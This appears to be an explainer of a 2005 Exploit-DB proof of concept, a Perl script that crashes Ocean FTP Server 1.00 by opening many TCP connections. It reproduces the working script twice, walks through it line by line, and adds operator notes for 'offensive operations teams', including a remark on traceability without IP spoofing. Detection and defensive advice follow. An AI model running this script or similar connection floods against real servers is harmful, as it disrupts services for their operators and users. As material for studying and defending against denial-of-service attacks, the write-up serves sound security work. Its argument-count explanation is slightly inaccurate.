Ocean FTP Server 1.00 Denial of Service Exploit Explained

What this paper is

This paper is a Proof-of-Concept (PoC) exploit for a Denial of Service (DoS) vulnerability in Ocean FTP Server version 1.00. It demonstrates how to crash the server by overwhelming it with too many simultaneous connections. The exploit is written in Perl.

Simple technical breakdown

The exploit works by opening a large number of TCP connections to the target FTP server. Each connection is established but not properly closed or utilized. The server, unable to handle this flood of open, idle connections, eventually runs out of resources and crashes. After the crash, the script waits for a specified duration before attempting to clean up any lingering connections (though at this point, the server is likely already down).

Complete code and payload walkthrough

The provided Perl script is a straightforward DoS tool. Let's break down its components:

#!/usr/bin/perl
###############################
# GSS-IT Research And Security Labs #
###############################
# #
# www.gssit.co.il #
# #
###############################
# Ocean FTP Server Ver 1.00 Denial Of Service POC #
###############################
# Use This PoC For Educational Purposes Only #
###############################

• Header Comments: These lines are comments providing attribution to the researchers (GSS-IT), the purpose of the script (DoS PoC for Ocean FTP Server v1.00), and a disclaimer about its educational use.

use Socket;

• use Socket;: This line imports the Socket module, which is essential for network programming in Perl. It provides functions for creating, connecting to, and managing network sockets.

if (($#ARGV) < 2)
{
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}

• Argument Check:
  • ($#ARGV): This checks the number of command-line arguments provided to the script. $#ARGV is the index of the last element in the @ARGV array (which holds command-line arguments). If less than 2 arguments are provided, it means the user hasn't supplied the required Host, Port, and Sleep values.
  • The if block prints usage instructions and then exits the script if the correct number of arguments isn't given.
  • $0: This special Perl variable holds the name of the script itself.

print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n");

• Header Output: This section prints a banner to the console, similar to the one in the argument check, confirming the script's identity.

$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');

• Variable Assignment:
  • $host = $ARGV[0];: Assigns the first command-line argument (the target host IP address or hostname) to the $host variable.
  • $port = $ARGV[1];: Assigns the second command-line argument (the target port, typically 21 for FTP) to the $port variable.
  • $slp = $ARGV[2];: Assigns the third command-line argument (the number of seconds to sleep after the DoS) to the $slp variable.
  • $proto = getprotobyname('tcp');: Retrieves the protocol number for TCP, which is needed for socket creation.

for ($i=1; $i<110; $i++)
{
  socket($i, PF_INET, SOCK_STREAM, $proto );
  $dest = sockaddr_in ($port, inet_aton($host));
  if (!(connect($i, $dest)))
  {
   Slp();
  }
 
}

• Connection Loop:
  • for ($i=1; $i<110; $i++): This loop iterates 109 times (from $i = 1 to $i = 109).
  • socket($i, PF_INET, SOCK_STREAM, $proto );: In each iteration, a new TCP socket is created.
    • $i: This is used as the file descriptor for the socket. The script uses separate file descriptors for each connection, numbered from 1 to 109.
    • PF_INET: Specifies the address family as IPv4.
    • SOCK_STREAM: Specifies the socket type as a stream socket (for TCP).
    • $proto: The protocol number for TCP obtained earlier.
  • $dest = sockaddr_in ($port, inet_aton($host));: This prepares the destination address structure for the connect call.
    • inet_aton($host): Converts the human-readable IP address or hostname ($host) into a packed binary format suitable for network operations.
    • sockaddr_in(...): Creates a socket address structure using the port number and the packed IP address.
  • if (!(connect($i, $dest))): Attempts to establish a connection to the target host and port using the socket $i.
    • connect($i, $dest): This function attempts to connect the socket $i to the address specified by $dest.
    • !(...): If the connect call fails (returns false), the if block is executed.
  • Slp();: If a connection fails, the Slp subroutine is called. This is a crucial part of the exploit's logic. The intent here is that if the server is already struggling or down, connections might fail. The script interprets this as a sign that the DoS might be effective or that it should proceed to the cleanup phase.

print("==> Unsuccesful <==");
exit;

• Post-Loop Message: If the loop completes without any connect calls failing (meaning all 109 connections were successfully established), this message is printed, indicating the exploit was "unsuccessful" in its primary goal of crashing the server by failing to connect. The script then exits.

sub Slp
{
 print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
 print("The Server Will Be Down For $slp Seconds\n\n");
 sleep ($slp);
 
 print("==> Killing Connections ...<==\n");
 for ($j=1; $j<110; $j++)
  {
   shutdown($j,2);
  }
 print ("[#] Back To Work Server Up [#] ");
 exit;
}

• Slp Subroutine: This subroutine is executed when a connect call fails within the main loop.
  • print(...): Prints messages indicating the server has been "successfully DoS'ed" and for how long it's expected to be down.
  • sleep ($slp);: Pauses the script execution for the duration specified by the $slp command-line argument. This is intended to simulate the server being down.
  • print("==> Killing Connections ...<==\n");: Informs the user that the script is now attempting to clean up.
  • for ($j=1; $j<110; $j++) { shutdown($j,2); }: This loop attempts to close all the sockets that were opened.
    • shutdown($j, 2): This function is used to shut down a socket. The argument 2 typically means a full duplex shutdown (both sending and receiving are disabled). The intent is to release the resources held by these connections.
  • print ("[#] Back To Work Server Up [#] ");: Prints a message indicating the server is "back up" (which is ironic, as the script assumes it was down).
  • exit;: Terminates the script.

Mapping list:

• #!/usr/bin/perl: Interpreter directive.
• use Socket;: Imports network programming library.
• if (($#ARGV) < 2): Checks for sufficient command-line arguments.
• print("Use : ..."): Displays usage instructions.
• $host = $ARGV[0];: Stores target hostname/IP.
• $port = $ARGV[1];: Stores target port.
• $slp = $ARGV[2];: Stores sleep duration.
• $proto = getprotobyname('tcp');: Gets TCP protocol number.
• for ($i=1; $i<110; $i++): Loop to create multiple connections.
• socket($i, PF_INET, SOCK_STREAM, $proto );: Creates a TCP socket.
• $dest = sockaddr_in ($port, inet_aton($host));: Prepares destination address.
• connect($i, $dest): Attempts to connect the socket.
• if (!(connect(...))): Checks if connection failed.
• Slp();: Calls the cleanup/reporting subroutine on connection failure.
• print("==> Unsuccesful <==");: Output if all connections succeed.
• sub Slp { ... }: Defines the subroutine executed on connection failure.
• print("\n\nServer $host Has Been Successfully DoS'ed\n\n");: Reports successful DoS.
• sleep ($slp);: Pauses execution.
• for ($j=1; $j<110; $j++) { shutdown($j,2); }: Closes all opened sockets.
• print ("[#] Back To Work Server Up [#] ");: Reports server is back up.
• exit;: Terminates the script.

Practical details for offensive operations teams

• Required Access Level: Network access to the target host is required. No elevated privileges on the target system are needed, as this is a network-based DoS.
• Lab Preconditions:
  • A vulnerable Ocean FTP Server v1.00 instance must be running on the target.
  • The target host must be reachable from the attacker's machine over TCP.
  • Firewalls must not block the outbound connection attempts from the attacker's machine to the target's FTP port.
• Tooling Assumptions:
  • Perl interpreter must be installed on the attacker's machine.
  • Basic network connectivity tools (like ping, nmap to verify service) are assumed for reconnaissance.
• Execution Pitfalls:
  • False Positives: The script's logic for determining a "successful DoS" is based on connection failures. If the server is already overloaded or down, connections will fail, triggering the Slp() subroutine. This might lead to a false report of a successful DoS when the server was already unavailable.
  • Connection Limit: The loop runs 109 times. This number might be too low to overwhelm a robust server or a server with a high connection limit. The server's ability to handle concurrent connections is the primary factor.
  • Network Latency/Packet Loss: High latency or packet loss can cause connect() calls to time out, which the script interprets as a failure. This could lead to the Slp() subroutine being called even if the server is healthy but slow to respond.
  • Resource Exhaustion: The exploit relies on the server exhausting its available resources (e.g., memory, file descriptors, process slots) for handling new connections. If the server has ample resources or is configured to limit new connections, this exploit may not be effective.
  • IP Spoofing: This script does not implement IP spoofing. The source IP will be the attacker's actual IP, making it traceable.
  • Payload Execution: This is a DoS exploit; it does not provide remote code execution or shell access. The goal is solely to disrupt service.
• Telemetry:
  • Outbound TCP SYN packets: A burst of SYN packets to the target FTP port (e.g., 21) from the attacker's IP.
  • Outbound TCP connection attempts: Numerous connect() calls being made.
  • Server-side logs: The target server might log incoming connection attempts. If the server crashes, it might generate crash dumps or system error logs.
  • Network monitoring: Intrusion Detection Systems (IDS) or Intrusion Prevention Systems (IPS) might detect a large number of connection attempts to a single host/port as a potential DoS attack.
  • Application logs: The Ocean FTP Server itself might log connection attempts or errors related to resource exhaustion before crashing.

Where this was used and when

• Context: This exploit targets a specific vulnerability in Ocean FTP Server version 1.00. Such vulnerabilities are typically discovered during security audits, penetration tests, or by security researchers.
• Timeframe: The exploit was published on March 21, 2005. This indicates the vulnerability existed and was exploitable around or before this date. It's highly likely that Ocean FTP Server v1.00 was in use during the early to mid-2000s.
• Usage: It would have been used by security professionals for authorized penetration testing to demonstrate the impact of such a vulnerability. It could also have been used by malicious actors if they had access to the software and were looking to disrupt services.

Defensive lessons for modern teams

• Keep Software Updated: The most fundamental defense is to ensure all software, especially network-facing services like FTP servers, is kept up-to-date with the latest security patches. This vulnerability is specific to version 1.00, implying later versions likely fixed it.
• Resource Limiting: Implement server-side configurations to limit the number of concurrent connections per client or overall. This can prevent a single client from exhausting server resources.
• Network Segmentation and Firewalls: Isolate FTP servers on a separate network segment. Use firewalls to restrict access to the FTP port (21) only from trusted IP addresses or networks.
• Intrusion Detection/Prevention Systems (IDS/IPS): Deploy IDS/IPS solutions that can detect patterns of suspicious network activity, such as a sudden surge of connection attempts to a single service, which is characteristic of DoS attacks.
• Regular Audits and Vulnerability Scanning: Proactively scan your environment for known vulnerabilities and outdated software.
• Logging and Monitoring: Ensure comprehensive logging is enabled on servers and network devices. Monitor logs for unusual activity, connection errors, or resource exhaustion warnings.
• Consider Alternatives: For modern environments, consider more secure and robust file transfer protocols like SFTP (SSH File Transfer Protocol) or FTPS (FTP over SSL/TLS) instead of plain FTP, which lacks encryption and has known security weaknesses.

ASCII visual (if applicable)

This exploit is a direct network interaction. A simple flow diagram can illustrate the process:

+-----------------+       +-----------------+       +-----------------+
| Attacker Machine| ----> | Target FTP Port | ----> | Ocean FTP Server|
| (Perl Script)   |       | (e.g., TCP 21)  |       | (v1.00)         |
+-----------------+       +-----------------+       +-----------------+
        |
        | 109 x TCP Connections (SYN, SYN-ACK, ACK)
        | (No data exchange, just connection establishment)
        |
        +------------------------------------------------> Server attempts to
                                                             handle each connection.
                                                             If it fails to connect
                                                             (e.g., server busy/down),
                                                             script reports DoS and exits.
                                                             If all connect, script reports failure.

Source references

• Paper ID: 893
• Paper Title: Ocean FTP Server 1.00 - Denial of Service
• Author: GSS IT
• Published: 2005-03-21
• Keywords: Windows, dos
• Paper URL: https://www.exploit-db.com/papers/893
• Raw Exploit URL: https://www.exploit-db.com/raw/893

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
###############################
# GSS-IT Research And Security Labs #
###############################
# #
# www.gssit.co.il #
# #
###############################
# Ocean FTP Server Ver 1.00 Denial Of Service POC #
###############################
# Use This PoC For Educational Purposes Only #
###############################
 
  
use Socket;
  

if (($#ARGV) < 2)
{
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}

print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n");


$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');


for ($i=1; $i<110; $i++)
{
  socket($i, PF_INET, SOCK_STREAM, $proto );
  $dest = sockaddr_in ($port, inet_aton($host));
  if (!(connect($i, $dest)))
  {
   Slp();
  }
 
}

print("==> Unsuccesful <==");
exit;


sub Slp

{

 print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
 print("The Server Will Be Down For $slp Seconds\n\n");
 sleep ($slp);
 
 print("==> Killing Connections ...<==\n");
 for ($j=1; $j<110; $j++)
  {
   shutdown($j,2);
  }
 print ("[#] Back To Work Server Up [#] ");
 exit;
}

# milw0rm.com [2005-03-21]